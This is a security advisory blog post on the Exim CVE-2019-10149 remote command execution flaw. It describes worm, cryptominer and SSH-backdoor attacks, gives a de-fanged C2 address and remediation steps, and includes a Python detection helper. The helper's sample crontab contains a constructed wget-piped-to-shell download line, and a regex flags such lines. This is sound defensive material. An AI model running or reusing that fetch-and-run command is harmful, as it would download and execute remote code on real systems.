An Exim server is a mail transfer agent used on Linux-like operating systems. Exim is free software and is used by as much as 57% of the Internet's email servers. Over the past couple of weeks it has been observed that a large number of Exim servers are under attack from two separate hacker groups.
What's the Vulnerability?
In typical fashion, whenever a new vulnerability is released there is always a person or group that tries to exploit it in the wild. CVE-2019-10149 is a security flaw that was publicly disclosed on June 5. It is a remote command execution vulnerability caused by improper validation of the recipient address in the deliver_message() function.
What's the Attack?
It is estimated that there are between 500,000 and 5.4 million Exim servers currently installed across the Internet. The attacks seen to date take over unpatched systems via a worm. The compromised host then scans the Internet for other servers and attempts to infect them as well. Infected servers are then configured as cryptocurrency miners.
Some organizations have also reported that these attacks create a backdoor into Exim servers by downloading a shell script that adds an SSH key to the root account.
How do I identify the signature?
According to many organizations reporting via Twitter, the first wave of attacks began on June 9. According to those reporting the exploit, there are two command-and-control servers, one of which is known; its address is http://173[.]212.214.137/s
The second type of attack is a little harder to identify, but basically goes something like this:
The attackers send an email with a "localpart" crafted to exploit the Exim vulnerability via the RCPT TO field.
Exim servers execute the "localpart" in their own user context when the message is received. The Envelope-From part downloads the nefarious shell script and executes it.
Since most Exim servers run as root, the nefarious script also runs as root, and then it's "Thanks for shopping for fresh pwnage."
Patch every Exim installation you have in your organization; at the time of writing the current version is 4.92.
Look for any unfamiliar cron jobs in your crontab and remove them. Restore legitimate cron jobs from existing backups.
Delete the authorized key used for SSH backdoor access.
Kill any cryptominer process and delete the application.
Check your firewall and access logs for the following hostnames:
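The checks above (Exim version, cron entries, root's authorized_keys, firewall and access logs) can be scripted. The helper below is an added example written for this post, not code from the original article or from the Exim project; it works on text you feed it, uses the one C2 address quoted above, and the sample log, crontab and key lines it carries are constructed, not real captures.

```python
import re

# Known C2 address quoted in the post (written there de-fanged as 173[.]212.214.137).
KNOWN_C2 = "173.212.214.137"
PATCHED = (4, 92)  # first fixed release named in the post
# Cron command that fetches a remote script and pipes it straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b")

def exim_is_patched(version: str) -> bool:
    """True when an 'exim -bV'-style version string reports 4.92 or newer."""
    m = re.search(r"(\d+)\.(\d+)", version)
    return bool(m) and (int(m.group(1)), int(m.group(2))) >= PATCHED

def c2_hits(log_text: str) -> list:
    """Firewall/access log lines that mention the known C2 address."""
    return [ln for ln in log_text.splitlines() if KNOWN_C2 in ln]

def suspicious_cron(crontab_text: str) -> list:
    """Cron lines that pipe a downloaded script to a shell or reference the C2."""
    return [ln for ln in crontab_text.splitlines()
            if not ln.lstrip().startswith("#")
            and (KNOWN_C2 in ln or FETCH_AND_RUN.search(ln))]

def unexpected_keys(authorized_keys: str, allowlist: set) -> list:
    """Entries in root's authorized_keys whose key material is not on the allowlist."""
    hits = []
    for ln in authorized_keys.splitlines():
        parts = ln.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Options may precede the key type; the key material follows the type token.
        for i, tok in enumerate(parts[:-1]):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                if parts[i + 1] not in allowlist:
                    hits.append(ln)
                break
    return hits

# Constructed sample inputs (not real captures) so the checks can be exercised offline.
SAMPLE_LOG = ("Jun 10 03:14:07 mx1 kernel: OUT=eth0 DST=173.212.214.137 DPT=80\n"
              "Jun 10 03:15:00 mx1 sshd: Accepted publickey for admin\n")
SAMPLE_CRON = ("0 3 * * * root /usr/local/bin/backup.sh\n"
               "* * * * * root wget -q -O - http://C2-PLACEHOLDER/s | sh\n")
SAMPLE_KEYS = ("ssh-ed25519 AAAAexampleKnownKey admin@corp\n"
               "ssh-rsa AAAAexampleUnknownKey root@unknown\n")
KNOWN_KEYS = {"AAAAexampleKnownKey"}

if __name__ == "__main__":
    print("patched:", exim_is_patched("Exim version 4.91 #1"))
    print("c2 log hits:", c2_hits(SAMPLE_LOG))
    print("suspicious cron:", suspicious_cron(SAMPLE_CRON))
    print("unexpected root keys:", unexpected_keys(SAMPLE_KEYS, KNOWN_KEYS))
```

On a live host, feed the functions the contents of `exim -bV`, `/etc/crontab` plus the cron spool, `/root/.ssh/authorized_keys` and your firewall logs, with the allowlist built from the keys you know belong there.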
Justin (he/him) is the founder and CEO of NuHarbor Security, where he continues to advance modern integrated cybersecurity services. He has over 20 years of cybersecurity experience, much of it earned while leading security efforts for multinational corporations, most recently serving as global CISO at Keurig Green Mountain Coffee. Justin serves multiple local organizations in the public interest, including his board membership at Champlain College.